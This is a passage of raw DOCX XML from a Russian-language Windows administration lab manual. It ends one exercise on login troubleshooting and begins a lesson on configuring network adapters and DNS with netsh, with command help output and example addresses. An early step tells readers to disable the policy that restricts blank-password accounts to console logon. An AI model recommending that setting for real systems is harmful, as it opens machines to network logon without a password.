          <w:rStyle w:val="a9"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Вход в систему не возможен: выбранный режим входа для данного пользователя на этом компьютере не предусмотрен.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> Необходимо изменить: П</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
        </w:rPr>
        <w:t>анель управления &gt; Администрирование &gt; Локальные параметры безопасности &gt; Локальные политики &gt; Параметры безопасности &gt; Учетные записи: ограничить использование пустых паролей только для консольного входа.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Изменить на Выключен. Это позволит входить на компьютер по сети от имени пользователя с пустым паролем и без включенной учетной записи Гостя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Необходимо провести все действия по устранению проблем входа в систему, записать в отчет свои наблюдения и выводы, ответить на контрольные вопросы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контрольные вопросы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Понятие проблемы входа в систему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Типы проблем входа в систему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сетевые ошибки Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="851" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Политики AppLocker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="0094432D">
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc26278729"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 10 Выявление и устранение проблем сетевых подключений</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель формирование навыков по в</w:t>
      </w:r>
      <w:r w:rsidR="00530866" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ыявлени</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidR="00530866" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и устранени</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidR="00530866" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> проблем сетевых подключений</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00530866" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> использование командной строки для выявления и устранения проблем сетевых подключений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454BB1" w:rsidRPr="00617AC0" w:rsidRDefault="00454BB1" w:rsidP="00454BB1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, программное обеспечение; ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454BB1" w:rsidRPr="00617AC0" w:rsidRDefault="00454BB1" w:rsidP="00454BB1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Согласно инструкции из теоретической части провести подключение виртуальной системы на базе VirtualBox к домену виртуальной сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00454BB1" w:rsidRPr="00617AC0" w:rsidRDefault="00454BB1" w:rsidP="00454BB1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты этапов выполнения работы и комментарии к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Согласно инструкции из теоретической части провести подключение виртуальной системы на базе VirtualBox к домену виртуальной сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Настройка параметров сетевого адаптера из командной строки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подключая ноутбук к разным сетям, иногда сталкиваешься с настройкой параметров сетевого адаптера под конкретную сеть, поскольку не все провайдеры и администраторы обеспечиваются настройку по DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Есть n-ное количество программ, например, NetSetMan, которые позволяют используя графический интерфейс выбирать профили настроек и применять их. Ошибки в таких программах при работе в Windows 7, а также другие причины заставляют отказаться от них в пользу командных файлов. Поэтому опишу несколько типовых командных файлов для смены настроек сетевого адаптера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>! Следует помнить, что действия по изменению параметров сетевого адаптера должны выполняться от имени пользователя с правами администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Посмотреть список всех сетевых адаптеров, можно используя команду </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netsh interface ip show config</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</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C:\Windows\System32&gt;netsh interface ip show config Настройка интерфейса </w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Беспроводное сетевое соединение</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> DHCP включен: Да IP-адрес 192.168.1.105 Префикс подсети: 192.168.1.0/24 (маска 255.255.255.0) Основной шлюз: 192.168.1.1 Метрика шлюза: 0 Метрика интерфейса: 25 DNS-серверы с настройкой через DHCP: 109.230.128.138 192.168.1.1 Зарегистрировать с суффиксом: Только основной WINS-серверы с настройкой через DHCP: Нет Настройка интерфейса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 включен: Да IP-адрес 192.168.1.101 Префикс подсети: 192.168.1.0/24 (маска 255.255.255.0) Основной шлюз: 192.168.1.1 Метрика шлюза: 0 Метрика интерфейса: 20 DNS-серверы с настройкой через DHCP: 109.230.128.138 192.168.1.1 Зарегистрировать с суффиксом: Только основной WINS-серверы с настройкой через DHCP: Нет</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Я слегка отформатировал вывод, чтобы проще воспринималось. Самое важное в данной команде это то, как называются наши сетевые адаптеры, параметры которых мы хотим изменить. В данном случае мы имеет два адаптера с именами </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Беспроводное сетевое соединение</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Команда выглядит следующим образом:</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497"/>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val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>C:\Windows\system32&gt;netsh interface ip set address help Использование: set address [name=]&lt;строка&gt; [[source=]dhcp|static] [[address=]&lt;IPv4-адрес&gt;[/&lt;целое_число&gt;] [[mask=]&lt;IPv4-маска&gt;] [[gateway=]&lt;IPv4-адрес&gt;|none [gwmetric=]&lt;целое_число&gt;] [[type=]unicast|anycast] [[subinterface=]&lt;строка&gt;] [[store=]active|persistent] Параметры: Тег Значение name - имя или индекс интерфейса. source - одно из следующих значений: dhcp: включение DHCP для настройки IP-адресов для указанного интерфейса. static: отключение использования DHCP для настройки IP-адресов для указанного интерфейса. Это значение указывается при настройке адреса или шлюза. address - добавляемый или изменяемый IPv4-адрес, за которым может следовать длина префикса подсети. mask - маска подсети IP для указанного IP-адреса. gateway - одно из следующих значений: &lt;IPv4-адрес&gt;: определенный шлюз по умолчанию для задаваемого статического IP-адреса. none: шлюзы по умолчанию не задаются. Этот параметр используется по умолчанию. gwmetric - метрика шлюза по умолчанию. Это поле следует задавать только тогда, когда указан шлюз. type - одно из следующих значений: unicast: адрес задается как адрес одноадресной рассылки. Этот параметр используется по умолчанию. anycast: адрес задается как адрес произвольной рассылки. subinterface - LUID подчиненного интерфейса, на котором существует шлюз по умолчанию. Этот параметр требуется только для интерфейсов с несколькими подчиненными интерфейсами. store - одно из следующих значений: active: параметр действует только до следующей загрузки. persistent: постоянный параметр. Этот параметр используется по умолчанию. Примечания: используется для включения или отключения DHCP для настройки IP-адресов. При этом также удаляются любые предыдущие статические IP-адреса и шлюзы по умолчанию или могут быть заданы новые статические IP-адреса и шлюзы по умолчанию. Примеры</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>: set address name=</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Local Area Connection</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> source=dhcp set address </w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Local Area connection</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> static 10.0.0.9 255.0.0.0 10.0.0.1 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Из этого описания хорошо видно, как использовать данную команду. Замечу, что все параметры кроме name необязательны и их можно не указывать. В частности это полезно, если вы не хотите задавать шлюз или метрику.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример 1. Задать автоматическое получение IP-параметров по протоколу DHCP для адаптера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497"/>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rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>netsh interface ip set address name=</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source=dhcp или netsh interface ip set address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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример 2. Задать статические IP-параметры для адаптера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 xml:space="preserve"> IP-адрес 213.108.211.11 с маской подсети 255.255.255.240 и шлюзом 213.108.211.10:</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497"/>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netsh interface ip set address name=</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source=static address=213.108.211.11 mask=255.255.255.240 gateway=213.108.211.10 или netsh interface ip set address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static 213.108.211.11 255.255.255.240 213.108.211.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Команда выглядит следующим образом:</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val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>C:\Windows\system32&gt;netsh interface ip set dnsservers help Применение: set dnsservers [name=]&lt;строка&gt; [source=]dhcp|static [[address=]&lt;IP-адрес&gt;|none] [[register=]none|primary|both] [[validate=]yes|no] Параметры Тег Значение name - Имя или индекс интерфейса. source - Одно из следующих значений: dhcp: назначает DHCP в качестве источника конфигурации DNS-серверов для определенного интерфейса. static: назначает в качестве источника конфигурации DNS-серверов локальную статическую конфигурацию. address - Одно из следующих значений: &lt;IP-адрес&gt;: IP-адрес DNS-сервера. none: очищает список DNS-серверов. register - Одно из следующих значений: none: отключает динамическую регистрацию DNS. primary: регистрация только с суффиксом основного DNS. both: регистрация как с суффиксом основного DNS, так и с суффиксом, определенным для подключения. validate - Указывает, выполняется ли проверка после настройки параметров DNS-сервера. Значение по умолчанию: yes.  Примечания. Задает в конфигурации DNS-сервера режим DHCP или статический режим. Параметр addr будет доступен для конфигурации статического списка IP-адресов DNS-серверов для указанного интерфейса только при установке источником static. Если значение параметра Validate равно yes, то новый DNS-сервер проверяется. Примеры</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> set dnsservers name=</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Local Area Connection</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> source=dhcp set dnsservers </w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Local Area Connection</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> static 10.0.0.1 primary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В сети гуляет подавляющее большинство описаний, где вместо dnsservers указывается dns. Это устаревший параметр, который оставлен для совместимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
